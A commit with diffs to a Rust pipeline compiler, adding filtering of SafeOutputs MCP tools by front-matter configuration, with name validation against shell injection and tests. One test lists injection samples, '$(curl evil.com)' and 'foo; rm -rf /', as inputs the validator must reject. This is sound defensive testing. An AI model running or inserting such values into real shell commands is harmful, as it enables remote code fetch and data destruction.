feat(mcp): filter SafeOutputs tools based on front matter config (#156)

* feat(mcp): filter SafeOutputs tools based on front matter config

Only expose safe output tools that are configured in the front matter's
safe-outputs section. This reduces agent confusion by hiding tools that
aren't configured for the current pipeline.

Implementation:
- Add --enabled-tools repeatable CLI arg to mcp and mcp-http commands
- SafeOutputs::new() accepts optional enabled tools list and uses
  ToolRouter::remove_route() to remove unconfigured tools at startup
- Compiler derives tool list from safe-outputs keys and emits
  --enabled-tools args in the pipeline template
- Always-on diagnostic tools (noop, missing-data, missing-tool,
  report-incomplete) are never filtered out

Backward compatible: if --enabled-tools is not passed (empty
safe-outputs or omitted), all tools remain available.

Note: MCPG has a tools field in its config schema but does not enforce
it at runtime. This change filters at the SafeOutputs server level
instead, making it self-contained.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: address PR review feedback for SafeOutputs tool filtering

- Validate tool names against safe regex (ASCII alphanumeric + hyphens)
  to prevent shell injection from malicious YAML keys
- Fix dangling backslash in base.yml when enabled_tools_args is empty
- Replace fragile exact-count assertion in test_tool_filtering_multiple_tools
  with explicit presence/absence checks

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: trailing space for enabled_tools_args and move ALWAYS_ON_TOOLS

- Add trailing space to generate_enabled_tools_args output when non-empty,
  preventing the last --enabled-tools value from concatenating with the
  next positional argument in the shell command
- Move ALWAYS_ON_TOOLS constant from mcp.rs to tools/mod.rs to avoid
  compile→mcp coupling (common.rs now imports from tools directly)
- Reduce list_all() calls in tool filtering to a single collect pass

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: warn on unrecognized safe-output keys at compile time

- Add ALL_KNOWN_SAFE_OUTPUTS constant in tools/mod.rs enumerating every
  valid safe-output key (MCP tools + always-on diagnostics + memory)
- Emit compile-time warning when a safe-outputs key doesn't match any
  known tool, catching typos like 'crate-pull-request' early
- Use HashSet for O(1) deduplication when merging always-on tools
- Rename misleading test to test_generate_enabled_tools_args_warns_on_unknown_tool
  and exercise the typo path (crate-pull-request)
- Document {{ enabled_tools_args }} template marker in AGENTS.md

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: skip unrecognized safe-output tool names in enabled-tools args

Previously, unrecognized tool names (e.g. typos like "crate-pull-request")
were warned about but still appended to --enabled-tools. This caused the
real tool (create-pull-request) to be silently filtered out at runtime
because it was absent from the enabled list.

Now unrecognized names are skipped entirely, making the warning and
behavior consistent. The warning message is also updated to be clearer.

Additional improvements:
- Add test asserting ALL_KNOWN_SAFE_OUTPUTS covers every router-registered
  tool, preventing the list from drifting when new tools are added
- Add integration test verifying --enabled-tools flags appear in compiled
  pipeline YAML (end-to-end: standalone.rs + generate_enabled_tools_args +
  template substitution)
- Document is_safe_tool_name newline-safety requirement
- Add explanatory comment in base.yml template for the inline substitution

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: skip non-MCP keys and warn on all-unrecognized safe-outputs

Address PR review feedback:

- Skip non-MCP safe-output keys (e.g. `memory`) from --enabled-tools
  generation. These keys have no MCP route, so including them would
  cause real MCP tools to be filtered out at runtime.

- Add prominent warning when all user-specified safe-output keys are
  invalid/unrecognized/non-MCP, since the agent would be restricted
  to diagnostic tools only.

- Remove unreachable `args.is_empty()` branch — ALWAYS_ON_TOOLS
  guarantees the args string is never empty when safe-outputs is
  configured.

- Add tests for memory key skipping and memory-only configuration.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: memory-only safe-outputs should not restrict MCP tools

When safe-outputs contains only non-MCP keys (e.g. just `memory`) or
only unrecognized names (typos), return empty args so all tools remain
available — matching backward-compatible behavior. Previously this
path would emit only ALWAYS_ON_TOOLS in --enabled-tools, silently
restricting the agent to 4 diagnostic tools.

Also:
- Add debug! log in server-side filtering for enabled-tools entries
  that have no matching route, aiding troubleshooting
- Add template comment documenting positional arg ordering requirement

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* refactor: derive safe-output tool lists from types at compile time

Replace hand-maintained string arrays with compile-time type-derived
lists using two new macros:

- tool_names![Type1, Type2, ...] → extracts ToolResult::NAME from
  each type into a &[&str] array
- all_safe_output_names![types...; "extra"] → combines type names
  with non-MCP string keys

Changes:
- Add ToolResult::REQUIRES_WRITE associated constant (default false)
- Extend tool_result! macro with `write = true` parameter (4 arms)
- Annotate all 17 write-requiring tools with write = true
- CreatePrResult (manual impl) also gets REQUIRES_WRITE = true
- Move WRITE_REQUIRING_SAFE_OUTPUTS from common.rs to tools/mod.rs
- Derive ALWAYS_ON_TOOLS, WRITE_REQUIRING_SAFE_OUTPUTS, and
  ALL_KNOWN_SAFE_OUTPUTS from type lists — no more string duplication
- Add NON_MCP_SAFE_OUTPUT_KEYS as public const in mod.rs
- Add 5 subset/consistency tests:
  - WRITE_REQUIRING ⊆ ALL_KNOWN
  - ALWAYS_ON ⊆ ALL_KNOWN
  - NON_MCP ⊆ ALL_KNOWN
  - REQUIRES_WRITE consistency (true for write tools, false for diag)
  - ALL_KNOWN count = write + diagnostic + non-MCP

Adding a new tool now requires adding its type to the list in mod.rs;
the name string is derived automatically from ToolResult::NAME,
eliminating the risk of typo drift between lists.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* chore: document 1ES safe-outputs filtering gap and clarify HashSet purpose

- Add note in onees.rs explaining that 1ES target does not support
  --enabled-tools filtering (uses service connections, not mcp-http)
- Clarify HashSet comment in generate_enabled_tools_args — it deduplicates
  across user keys and ALWAYS_ON_TOOLS, not within HashMap keys

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: correct all_safe_output_names! doc comment and rename variable

- Fix doc comment: example showed two semicolons but macro only accepts
  one. Clarify that all types go before the semicolon, string keys after.
- Rename user_tool_count → effective_mcp_tool_count for clarity — it
  counts recognized, valid, non-MCP keys, not all user-specified keys.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

* fix: promote unmatched enabled-tools log to warn and add disjointness checks

- Promote debug! to warn! for --enabled-tools entries with no matching
  route, matching the compile-time warning severity. A typo like
  "crate-pull-request" would otherwise be invisible in production logs.
- Add explicit disjointness assertions in test_all_known_completeness
  so overlapping lists produce a clear "tool X in both lists" message
  rather than a confusing count mismatch.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

---------

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>

Author: jamesadevine

AGENTS.md

@@ -605,6 +605,16 @@ Should be replaced with the comma-separated domain list for AWF's `--allow-domai
 
 The output is formatted as a comma-separated string (e.g., `github.com,*.dev.azure.com,api.github.com`).
 
+## {{ enabled_tools_args }}
+
+Should be replaced with `--enabled-tools <name>` CLI arguments for the SafeOutputs MCP HTTP server. The tool list is derived from `safe-outputs:` front matter keys plus always-on diagnostic tools (`noop`, `missing-data`, `missing-tool`, `report-incomplete`).
+
+When `safe-outputs:` is empty (or omitted), this is replaced with an empty string and all tools remain available (backward compatibility). When non-empty, the replacement includes a trailing space to prevent concatenation with the next positional argument in the shell command.
+
+Tool names are validated at compile time:
+- Names must contain only ASCII alphanumerics and hyphens (shell injection prevention)
+- Unrecognized names (not in `ALL_KNOWN_SAFE_OUTPUTS`) emit a warning to catch typos
+
 ## {{ cancel_previous_builds }}
 
 When `triggers.pipeline` is configured, this generates a bash step that cancels any previously queued or in-progress builds of the same pipeline definition. This prevents multiple builds from accumulating when the upstream pipeline triggers rapidly (e.g., multiple PRs merged in quick succession).

src/compile/common.rs

@@ -671,29 +671,94 @@ pub fn generate_executor_ado_env(write_service_connection: Option<&str>) -> Stri
     }
 }
 
-/// Safe-output names that require write access to ADO.
-const WRITE_REQUIRING_SAFE_OUTPUTS: &[&str] = &[
-    "create-pull-request",
-    "create-work-item",
-    "comment-on-work-item",
-    "update-work-item",
-    "create-wiki-page",
-    "update-wiki-page",
-    "add-pr-comment",
-    "link-work-items",
-    "queue-build",
-    "create-git-tag",
-    "add-build-tag",
-    "create-branch",
-    "update-pr",
-    "upload-attachment",
-    "submit-pr-review",
-    "reply-to-pr-review-comment",
-    "resolve-pr-review-thread",
-];
+/// Returns true if the name contains only ASCII alphanumerics and hyphens.
+/// This value is embedded inline in a shell command, so control characters
+/// (including newlines) and whitespace must be rejected to prevent corruption.
+fn is_safe_tool_name(name: &str) -> bool {
+    !name.is_empty() && name.chars().all(|c| c.is_ascii_alphanumeric() || c == '-')
+}
+
+/// Generate `--enabled-tools` CLI args for the SafeOutputs MCP server.
+///
+/// Derives the tool list from `safe-outputs:` front matter keys plus always-on
+/// diagnostic tools. If `safe-outputs:` is empty, returns an empty string
+/// (all tools enabled for backward compatibility).
+///
+/// Non-MCP keys (like `memory`) are silently skipped — they are handled by the
+/// executor and have no corresponding MCP route.
+///
+/// Tool names are validated to contain only ASCII alphanumerics and hyphens
+/// to prevent shell injection when the args are embedded in bash commands.
+/// Unrecognized tool names emit a compile-time warning and are skipped.
+pub fn generate_enabled_tools_args(front_matter: &FrontMatter) -> String {
+    use crate::tools::{ALL_KNOWN_SAFE_OUTPUTS, ALWAYS_ON_TOOLS, NON_MCP_SAFE_OUTPUT_KEYS};
+    use std::collections::HashSet;
+
+    if front_matter.safe_outputs.is_empty() {
+        return String::new();
+    }
+
+    // `seen` deduplicates across user keys and ALWAYS_ON_TOOLS (e.g. if the user
+    // configures `noop` explicitly, it shouldn't appear twice in the output).
+    let mut seen = HashSet::new();
+    let mut tools: Vec<String> = Vec::new();
+    let mut effective_mcp_tool_count = 0usize;
+    for key in front_matter.safe_outputs.keys() {
+        if !is_safe_tool_name(key) {
+            eprintln!(
+                "Warning: skipping invalid safe-output tool name '{}' (must be ASCII alphanumeric/hyphens only)",
+                key
+            );
+            continue;
+        }
+        if NON_MCP_SAFE_OUTPUT_KEYS.contains(&key.as_str()) {
+            continue;
+        }
+        if !ALL_KNOWN_SAFE_OUTPUTS.contains(&key.as_str()) {
+            eprintln!(
+                "Warning: unrecognized safe-output tool '{}' — skipping (no registered tool matches this name)",
+                key
+            );
+            continue;
+        }
+        effective_mcp_tool_count += 1;
+        if seen.insert(key.clone()) {
+            tools.push(key.clone());
+        }
+    }
+
+    if effective_mcp_tool_count == 0 {
+        // Every user-specified key was either invalid, unrecognized, or non-MCP
+        // (e.g. memory-only). Return empty to keep all tools available (backward compat).
+        return String::new();
+    }
+
+    // Always include diagnostic tools
+    for tool in ALWAYS_ON_TOOLS {
+        let name = tool.to_string();
+        if seen.insert(name.clone()) {
+            tools.push(name);
+        }
+    }
+
+    tools.sort();
+
+    let args = tools
+        .iter()
+        .map(|t| format!("--enabled-tools {}", t))
+        .collect::<Vec<_>>()
+        .join(" ");
+
+    // Trailing space so the args don't concatenate with the next positional
+    // argument when embedded inline in the shell template.
+    // `args` is never empty here because ALWAYS_ON_TOOLS always contributes entries.
+    args + " "
+}
 
 /// Validate that write-requiring safe-outputs have a write service connection configured.
 pub fn validate_write_permissions(front_matter: &FrontMatter) -> Result<()> {
+    use crate::tools::WRITE_REQUIRING_SAFE_OUTPUTS;
+
     let has_write_sc = front_matter
         .permissions
         .as_ref()
@@ -1637,4 +1702,88 @@ mod tests {
         ).unwrap();
         assert!(validate_resolve_pr_thread_statuses(&fm).is_ok());
     }
+
+    // ─── Enabled tools args generation ──────────────────────────────────
+
+    #[test]
+    fn test_generate_enabled_tools_args_empty_safe_outputs() {
+        let (fm, _) = parse_markdown(
+            "---\nname: test\ndescription: test\n---\n"
+        ).unwrap();
+        let args = generate_enabled_tools_args(&fm);
+        assert!(args.is_empty(), "Empty safe-outputs should produce no args");
+    }
+
+    #[test]
+    fn test_generate_enabled_tools_args_with_configured_tools() {
+        let (fm, _) = parse_markdown(
+            "---\nname: test\ndescription: test\nsafe-outputs:\n  create-pull-request:\n    target-branch: main\n  create-work-item:\n    work-item-type: Task\n---\n"
+        ).unwrap();
+        let args = generate_enabled_tools_args(&fm);
+        assert!(args.contains("--enabled-tools create-pull-request"));
+        assert!(args.contains("--enabled-tools create-work-item"));
+        // Always-on tools should also be included
+        assert!(args.contains("--enabled-tools noop"));
+        assert!(args.contains("--enabled-tools missing-data"));
+        assert!(args.contains("--enabled-tools missing-tool"));
+        assert!(args.contains("--enabled-tools report-incomplete"));
+    }
+
+    #[test]
+    fn test_generate_enabled_tools_args_no_duplicates() {
+        // If a diagnostic tool is also in safe-outputs, it shouldn't appear twice
+        let (fm, _) = parse_markdown(
+            "---\nname: test\ndescription: test\nsafe-outputs:\n  noop:\n    max: 5\n---\n"
+        ).unwrap();
+        let args = generate_enabled_tools_args(&fm);
+        let noop_count = args.matches("--enabled-tools noop").count();
+        assert_eq!(noop_count, 1, "noop should appear exactly once");
+    }
+
+    #[test]
+    fn test_is_safe_tool_name() {
+        assert!(is_safe_tool_name("create-pull-request"));
+        assert!(is_safe_tool_name("noop"));
+        assert!(is_safe_tool_name("my-tool-123"));
+        assert!(!is_safe_tool_name(""));
+        assert!(!is_safe_tool_name("$(curl evil.com)"));
+        assert!(!is_safe_tool_name("foo; rm -rf /"));
+        assert!(!is_safe_tool_name("tool name"));
+        assert!(!is_safe_tool_name("tool\ttab"));
+    }
+
+    #[test]
+    fn test_generate_enabled_tools_args_skips_unknown_tool() {
+        // An unrecognized (but safe-formatted) tool name should be skipped.
+        // When no valid MCP tools remain, return empty (all tools available).
+        let (fm, _) = parse_markdown(
+            "---\nname: test\ndescription: test\nsafe-outputs:\n  crate-pull-request:\n    target-branch: main\n---\n"
+        ).unwrap();
+        let args = generate_enabled_tools_args(&fm);
+        assert!(!args.contains("crate-pull-request"), "Unrecognized tool should be skipped");
+        assert!(args.is_empty(), "All-unrecognized safe-outputs should produce no args (all tools available)");
+    }
+
+    #[test]
+    fn test_generate_enabled_tools_args_skips_memory_key() {
+        // `memory` is a non-MCP executor-only key. It must not appear in
+        // --enabled-tools or it would cause real MCP tools to be filtered out.
+        let (fm, _) = parse_markdown(
+            "---\nname: test\ndescription: test\nsafe-outputs:\n  memory:\n    allowed-extensions:\n      - .md\n  create-pull-request:\n    target-branch: main\n---\n"
+        ).unwrap();
+        let args = generate_enabled_tools_args(&fm);
+        assert!(!args.contains("--enabled-tools memory"), "Non-MCP key 'memory' should be skipped");
+        assert!(args.contains("--enabled-tools create-pull-request"), "Real MCP tool should be present");
+    }
+
+    #[test]
+    fn test_generate_enabled_tools_args_memory_only_does_not_filter() {
+        // When `memory` is the only safe-output key, no --enabled-tools args should
+        // be generated so all tools remain available (backward compat).
+        let (fm, _) = parse_markdown(
+            "---\nname: test\ndescription: test\nsafe-outputs:\n  memory:\n    allowed-extensions:\n      - .md\n---\n"
+        ).unwrap();
+        let args = generate_enabled_tools_args(&fm);
+        assert!(args.is_empty(), "memory-only safe-outputs should produce no args (all tools available)");
+    }
 }

src/compile/onees.rs

@@ -159,6 +159,12 @@ displayName: "Finalize""#,
         // Validate resolve-pr-review-thread has required allowed-statuses field
         validate_resolve_pr_thread_statuses(front_matter)?;
 
+        // NOTE: 1ES target does not support --enabled-tools filtering (safe-outputs
+        // tool filtering). 1ES uses service connections for MCP servers rather than
+        // mcp-http, so generate_enabled_tools_args is not called here. If safe-outputs
+        // filtering is needed for 1ES, it would require changes to the 1ES pipeline
+        // template and agency job configuration.
+
         // Replace all template markers
         let compiler_version = env!("CARGO_PKG_VERSION");
         let replacements: Vec<(&str, &str)> = vec![

src/compile/standalone.rs

@@ -17,12 +17,13 @@ use super::common::{
     self, AWF_VERSION, COPILOT_CLI_VERSION, DEFAULT_POOL, MCPG_PORT, MCPG_VERSION,
     compute_effective_workspace, generate_acquire_ado_token, generate_cancel_previous_builds,
     generate_checkout_self, generate_checkout_steps, generate_ci_trigger, generate_copilot_ado_env,
-    generate_copilot_params, generate_executor_ado_env, generate_header_comment,
-    generate_job_timeout, generate_pipeline_path, generate_pipeline_resources, generate_pr_trigger,
-    generate_repositories, generate_schedule, generate_source_path, generate_working_directory,
-    replace_with_indent, sanitize_filename, validate_comment_target,
-    validate_resolve_pr_thread_statuses, validate_submit_pr_review_events,
-    validate_update_pr_votes, validate_update_work_item_target, validate_write_permissions,
+    generate_copilot_params, generate_enabled_tools_args, generate_executor_ado_env,
+    generate_header_comment, generate_job_timeout, generate_pipeline_path,
+    generate_pipeline_resources, generate_pr_trigger, generate_repositories, generate_schedule,
+    generate_source_path, generate_working_directory, replace_with_indent, sanitize_filename,
+    validate_comment_target, validate_resolve_pr_thread_statuses,
+    validate_submit_pr_review_events, validate_update_pr_votes,
+    validate_update_work_item_target, validate_write_permissions,
 };
 use super::types::{FrontMatter, McpConfig};
 use crate::allowed_hosts::{CORE_ALLOWED_HOSTS, mcp_required_hosts};
@@ -85,6 +86,9 @@ impl Compiler for StandaloneCompiler {
         // Generate comma-separated domain list for AWF
         let allowed_domains = generate_allowed_domains(front_matter);
 
+        // Generate --enabled-tools args for SafeOutputs tool filtering
+        let enabled_tools_args = generate_enabled_tools_args(front_matter);
+
         // Pool name
         let pool = front_matter
             .pool
@@ -183,6 +187,7 @@ impl Compiler for StandaloneCompiler {
             ("{{ working_directory }}", &working_directory),
             ("{{ workspace }}", &working_directory),
             ("{{ allowed_domains }}", &allowed_domains),
+            ("{{ enabled_tools_args }}", &enabled_tools_args),
             ("{{ agent_content }}", markdown_body),
             ("{{ acquire_ado_token }}", &acquire_read_token),
             ("{{ copilot_ado_env }}", &copilot_ado_env),

src/main.rs

@@ -47,6 +47,9 @@ enum Commands {
         output_directory: String,
         /// Guard against directory traversal attacks by specifying the agent cannot influence folders outside this path
         bounding_directory: String,
+        /// Only expose these safe output tools (can be repeated). If omitted, all tools are exposed.
+        #[arg(long = "enabled-tools")]
+        enabled_tools: Vec<String>,
     },
     /// Execute safe outputs from Stage 1 (Stage 2 of the pipeline)
     Execute {
@@ -84,6 +87,9 @@ enum Commands {
         output_directory: String,
         /// Guard against directory traversal attacks
         bounding_directory: String,
+        /// Only expose these safe output tools (can be repeated). If omitted, all tools are exposed.
+        #[arg(long = "enabled-tools")]
+        enabled_tools: Vec<String>,
     },
     /// Detect agentic pipelines and update GITHUB_TOKEN on their ADO definitions
     Configure {
@@ -167,7 +173,11 @@ async fn main() -> Result<()> {
             Commands::Mcp {
                 output_directory,
                 bounding_directory,
-            } => mcp::run(&output_directory, &bounding_directory).await?,
+                enabled_tools,
+            } => {
+                let filter = if enabled_tools.is_empty() { None } else { Some(enabled_tools) };
+                mcp::run(&output_directory, &bounding_directory, filter.as_deref()).await?
+            }
             Commands::Execute {
                 source,
                 safe_output_dir,
@@ -273,8 +283,10 @@ async fn main() -> Result<()> {
                 api_key,
                 output_directory,
                 bounding_directory,
+                enabled_tools,
             } => {
-                mcp::run_http(&output_directory, &bounding_directory, port, api_key.as_deref())
+                let filter = if enabled_tools.is_empty() { None } else { Some(enabled_tools) };
+                mcp::run_http(&output_directory, &bounding_directory, port, api_key.as_deref(), filter.as_deref())
                     .await?;
             }
             Commands::Configure {